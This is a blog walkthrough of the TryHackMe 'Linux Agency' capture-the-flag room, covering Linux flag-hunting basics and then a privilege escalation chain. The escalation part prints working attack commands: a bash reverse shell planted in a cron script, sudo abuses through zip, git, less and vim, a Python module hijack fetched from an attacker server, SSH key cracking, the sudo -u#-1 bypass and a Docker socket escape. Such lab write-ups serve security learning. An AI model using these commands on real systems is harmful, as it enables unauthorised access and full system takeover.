TryHackMe: Linux Agency writeup/walkthrough

Writeup/Tutorial for the room ‘Linux Agency’ on TryHackMe

Phantom_95
14 min readJan 30, 2021

Room Link | Medium difficulty

Table of content

Deploy the machine and in the meantime, connect to the THM network:

sudo openvpn --config <your_vpn_file>

Task 2: Let’s just jump in

#1. SSH into the machine

ssh agent47@<Machine_IP>
<Type Yes when prompted to continue>
<Enter agent47’s password>

Task 3: Linux Fundamentals

#1. What is the mission1 flag?
When you login successfully and it shows a message, the flag for mission1 should be at the very end of that message.

use su mission1
Enter the whole flag as the password: flag{md5sum}

#2. What is the mission2 flag?
Go to home directory and the flag should be there:

cd ~
ls

3#. What is the mission3 flag?

Go to mission3’s home directory and the flag should be in a file. Output it’s content and get the flag:

cd ~
ls
cat flag.txt

#4. What is the mission4 flag?

cd ~
ls
cat flag.txt
nano flag.txt
Ctrl+X to exit nano editor (Press n if prompted to write changes)

5#. What is the mission5 flag?

cd ~
ls
cd flag
cat flag.txt

6#. What is the mission6 flag?

cd ~
ls -la
cat .flag.txt

#7. What is the mission7 flag?

cd ~
ls -la
cd .flag/
cat flag.txt

#8. What is the mission8 flag?

You must get out of mission 6 directory while being mission6 before doing anything. Go to /home directory as mission6

su mission6
<Enter flag for mission6>
cd /home
su mission7
<Enter flag for mission7>
cd mission7
ls
cat flag.txt

#9. What is the mission9 flag?

cd ~
ls -la
locate flag.txt
cat /flag.txt

#10. What is the mission10 flag?

rockyou.txt is a wordlist containing common passwords but it is a very long list. We know from previous answers that the flag will have ‘mission’ in it so let’s take the output of rockyou.txt and pass it onto grep to filter out any text with ‘mission10’ in it

cd ~
ls
cat rockyou.txt | grep mission10

I pressed Ctrl+C to stop the output once I saw the flag.

#11. What is the mission11 flag?

There were a lot of directories and sub-directories so I decided to use locate to find the flag. There will be 2 outputs, /flag.txt and mission11’s flag. The first flag is for mission9 so skip that.

cd ~ 
locate flag.txt
cat /home/mission10/folder/L4D8/L3D7/L2D2/L1D10/flag.txt

#12. What is the mission12 flag?

The hint mention EVS(I think it meant EVs) which is short for Environment Variables. There are default environment variables and you can create some and store a value in it. I took a guess and outputted the value of an EV called FLAG.

echo $FLAG

#13. What is the mission13 flag?

If you check the permissions on the flag in ~/ directory, you’ll see that it says permission denied. If you check the flag’s permission, you’ll see that no permissions are set, meaning no one can read, write or execute the file. Since the user mission12 owns the file and we are logged in as mission12, we can change it’s permission with chmod.

cd ~
ls -la | grep flag
chmod 777 flag.txt
ls -la | grep flag
cat flag.txt

#14. What is the mission14 flag?

the flag is encoded using base64 which is a form of encoding. To decode it in terminal, we can use base64 as the tool and -d option to decode it.(Credit)

cd ~
cat flag.txt | base64 -d

#15. What is the mission15 flag?

The flag is in binary format. Any Binary to ASCII converter should do. Here is the one I used (Credit)

cd ~
ls
cat flag.txt
Copy the flag.txt output and paste it into a Binary to ASCII convertor

#16. What is the mission16 flag?

The flag is in hex format. Any Hex to ASCII converter should do the trick. Here is the one I used (Credit)

#17. What is the mission17 flag?

cd ~
ls -la

If you output the contents of this file, you’ll see gibberish. If you check what file type it is, it will say ELF 64 bit LSB shared object. If you check search that online, it will say it is Executable and Linkable Format. If it works as an executable, then let’s execute it. But first we have to give the flag executable permission.

file flag
chmod 777 flag
./flag

#18. What is the mission18 flag?

There is .java file in there. To get the flag, we need to compile the .java file first and then we’ll be able to get the flag(Credit).

cd ~
ls
javac flag.java
ls
java flag

#19. What is the mission19 flag?

Using ‘file’ I was able to confirm it is a file related to ruby and to run a ruby script(Credit):

cd ~
ls -la
file flag.rb
ruby flag.rb

#20. What is the mission20 flag?

Using file, we can see that it is a C file. We need to compile it and then execute the output file (Credit):

gcc flag.c
./a.out

#21. What is the mission21 flag?

Looking at the file extension I was able to tell that it is a python file as it ends in ‘.py’. There are 2 versions of python, python2 or normally known as python and python3. Hence why I tried both.

cd ~
ls
python flag.py
python3 flag.py

#22. What is the mission22 flag?

When you login to the next machine, if it doesn’t show a $ sign for a few seconds after entering the password correctly, press Enter and you should see a $ sign.

echo $SHELL
bash

#23. What is the mission23 flag?

In this mission, we only need to spawn a shell using python3 since python3 is our interpreter or current shell.

import pty;pty.spawn(‘/bin/bash’)
cd ~
ls
cat flag.txt

#24. What is the mission24 flag?

cd ~
ls
cat message.txt
cat /etc/hosts
wget mission24.com
ls
cat index.html | grep mission

#25. What is the mission25 flag?

cd ~
ls -la
cat .viminfo | grep mission

#26. What is the mission26 flag?

The path variable for most commands is not set for this user and hence there is an error for the command you type. To fix this, we have to call the tool directory from it’s path:

cd ~
/bin/cat flag.txt

Once you get the flag, su will also not work when trying to change users. Again, we have to call su from it’s path

/bin/su mission26
<Enter the flag for mission26 here>

#27. What is the mission27 flag?

cd ~
ls -la
file flag.jpg

#28. What is the mission28 flag?

ls -la
file flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
# The file is a gzip as seem from above command's output. Lets decompress:gzip -d flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz# Instead of writing the full name, just type flag and then press tab to autocompletefile flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png# Now it’s a GIF image data filecat flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png

Again, type flag and press tab for autocomplete, if it doesn’t work just copy the name.

#29. What is the mission29 flag?

Thanks to bhaskar_pal for helping me out here and a few other places!

`ls ~`
`cat ~/txt.galf`
# Copy the flag which has characters in reverse
exit
# Use rev to reverse output of the flag(Ref)
echo
<Put flag here in quotations> | rev

#30. What is the mission30 flag?

cd bludit/
ls -la
cat .htpasswd

#31. What is viktor’s Flag?

cd ~/Escalator/.git/logs
cat HEAD

Task 4: Privilege Escalation

#1. su into viktor user using viktor’s flag as password

su viktor
<Enter viktor’s flag>

#2. What is dalia’s flag?

For most of the users I had to use linpeas.sh to look for anything interesting that will help me get privilege escalation and for that I kept a linpeas.sh in my attacking machine and started a python simpleHTTPServer in a separate terminal. I used wget <url to python server> to download linpeas.sh and then ran it from the remote machine.

cat /etc/crontab# Open new terminal and start nc listener
nc -lvnp 9001
# Get back to the terminal where viktor is logged in and add a reverse shell to the script as dalia is running it
nano /opt/scripts/47.sh
echo “bash -c ‘bash -i >& /dev/tcp/<Your_THM_VPN_IP>/9001 0>&1’” > /opt/scripts/47.sh
# Save the file and go to the terminal where you started the netcat listener. You should get a shell in 30s since that script is set to run every 30 seconds. If not, try the the above command again and wait in the other shell
cd ~
cat flag.txt
On Remote Host (Linux Agency SSH )
On Attacking machine (My computer)

#3. What is silvio’s flag?

GTFOBins — Zip

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
# Ctrl + z to background shell. Make sure yoou are using bash shell. the below command probably wont work properly if you are using zsh shell.
stty raw -echo
fg
(You probably won't see fg here so don’t worry about)
Press Enter twice
# Copy the 3 lines of code below, paste it in dalia's shell and press enter
TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT ‘sh #’
sudo rm $TF
cd /home/silvio
# It will say enter password for silvio, just keep pressing enter and dont worry about wrong pass. Once wrong passed shows up 3 times, you will then be running as silvio meaning you were successful in escalating privilege.
ls -la
cat flag.txt

#4. What is reza’s flag?

Using linpeas on silvio’s account, we find that we can run git with reza’s privilege.

bash
sudo -u reza PAGER=’sh -c “exec bash 0<&1”’ git -p help
cd ../reza
cat flag.txt

#5. What is jordan’s flag?

# If you do sudo -l, you’ll see that you can set environment variables and you can run the /opt/scripts/Gun-Shop.py with Jordan user privilege.
sudo -l
sudo -u jordan /opt/scripts/Gun-Shop.py
# When you run the script, it will say shop module not found. Because there is no such module installed on the system which is named shop so let’s make a script which will elevate our privelege.# Create a file with the name shop.py on your attacking machine and add the following to it:
import os
os.system(“/bin/bash”)
python -m SimpleHTTPServer# The above python command opens a server at your VPN IP as listed on THM with port 8000. Go to the http://<Your_THM_IP>:8000/ to see if it works. See if the shop.py is there on the webpage. Right click on shop.py in the browser and copy it's link.
# On the remote machine where reza is logged in, do the following:
cd /tmp
wget http://<Your_THM_IP>:8000/shop.py
sudo -u jordan PYTHONPATH=/tmp /opt/scripts/Gun-Shop.py
# We are setting PYTHONPATH along with sudo and then running the script so that when the script is run, it will look through the python paths one of which will be /tmp and in tmp it will find a shop.py file which will be used as the module for the Gun-Shop.py script. The script starts a bash shell but since it is run with Jordan’s privilege, we will get jordan user privilege.cd /home/jordan
ls
cat flag.txt | rev
# The flags characters are in reverse order so we can use rev to get it back to the correct form

#6. What is ken’s flag?

sudo -l
sudo -u ken /usr/bin/less /etc/profile
# It will open up a file that you can see in 2nd image below. Just start typing the next line of code when you see a similar image and then press Enter.
!/bin/bash
cd /home/ken
cat flag.txt

#7. What is sean’s flag?

sudo -l
sudo -u sean /usr/bin/vim -c ‘:!/bin/bash’
groups
# This shows that sean is part of adm group (admin) which means he can read logs in /var/logs (Credit)
cd /var/log
cat syslog.bak | grep sean

#8. What is penelope’s flag?

# When you find sean’s flag, there will be a base64 string right after it. Copy that, echo it and decode it using base64 with -d option.echo ‘VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==’ | base64 -d
<Copy the outputted password>
ssh penelope@<Machine_IP>
<Paste penelope’s password>

If you read the /etc/ssh/sshd_config file, you will see that penelope and maya can use ssh to login so if you restart machine, you wont have to go through all the other users. It’s like a checkpoint and you can start from here if you want to stop and start later on.

#9. What is maya’s flag?

ls -la
LFILE=/home/maya/flag.txt
./base64 “$LFILE” | base64 --decode
The flag is also maya’s password so use that to switch accounts

#10. What is robert’s Passphrase?

SCP

scp maya@<machineIP>:~/old_robert_ssh/id_rsa ./
<Enter maya's flag/password>
locate ssh2john.py
<Copy the path, might have to download if it shows no path>
<copy a ssh2john.py path from above command> id_rsa > id_hash.txtjohn --wordlist=./rockyou.txt id_hash.txt

#11. What is user.txt?

cd ~/old_robert_ssh
ss -lnp | grep tcp | grep LISTEN
# With the above command, we find that there is a tcp listening port on a few ports one of which is 2222 and that is used on localhost to connect to robert.ssh robert@localhost -p 2222 -i id_rsa
<Enter robert's password that we just cracked>

We can access robert’s account with ssh on localhost at port 2222. When logged into robert’s account, do this:

sudo -l
sudo --version
sudo -u#-1 /bin/bash
# The sudo version of this is outdated which has a vulnerability that we can exploit (Credit)
It's just a one line command you need to run
cd /root
cat flag.txt
cat success.txt

#12. What is root.txt?

I would like to thank apjone for helping me find the root flag.

# Make sure you maintain the root privilege from the last task otherwise it will say docker permission denied later on. It's just a one line command you need to run. If you don't have the root privilege, then do (sudo -u#-1 /bin/bash)
cd /tmp
./docker ps
./docker exec -it ec96850005d6 bash
# The ec96850005d6 is the Container ID we need to go into
Underlined is the Container ID we need to go into

# Download socat binary from here
# On attacking machine(your machine), start a python server where you downloaded the socat binary on your computer so that you can wget it onto robert’s account# wget directly from github in robert’s account wasn't working so that’s why I did this.
python -m SimpleHTTPServer
# On robert’s computer
wget <Your_THM_IP>:8000/socat
chmod +x socat
Make sure to give socat the execute permission using chmod

We need to escape the docker by creating a container within the container that we are currently in and mounting the host system so that way we can access all the host files within the container. If the commands below do not work, go the link at the end and copy the commands directly from source. You might have to change them a bit to match mine eg: Make sure Source value in echo -e … command is set to /, not /etc/ (Credit)

curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/jsonecho -e ‘{“Image”:”mangoman”,”Cmd”:[“/bin/sh”],”DetachKeys”:”Ctrl-p,Ctrl-q”,”OpenStdin”:true,”Mounts”:[{“Type”:”bind”,”Source”:”/”,”Target”:”/host_etc”}]}’ > container.jsoncurl -XPOST -H “Content-Type: application/json” --unix-socket /var/run/docker.sock -d “$(cat container.json)” http://localhost/containers/createcurl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<1st_4_chars_of_Id_value_from_output_of_above_command>/start./socat — UNIX-CONNECT:/var/run/docker.sock# Copy the code below from POST till tcp and change what needs to be changed. Paste it in your terminal. See image below for reference.POST /containers/<1st_4_chars_of_Id_value_from_before>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
<Press enter twice>
Replace the <1st 4 chars …> with the 1st 4 characters of the Id values as underlined here. Press Enter twice once pasted and if successful, you’ll get the HTTP/1.1 101 UPGRADED part.
id
find / -name ‘root.txt’ 2>/dev/null
cat /host_etc/root/root.txt

Would appreciate some claps and please leave any responses if you have any questions or see any mistake I made here. That’s all for this room. Follow me for more write-ups!

--

--

Phantom_95
Phantom_95

Written by Phantom_95

I like all things IT but currently focused on being an IT Security Specialist.

No responses yet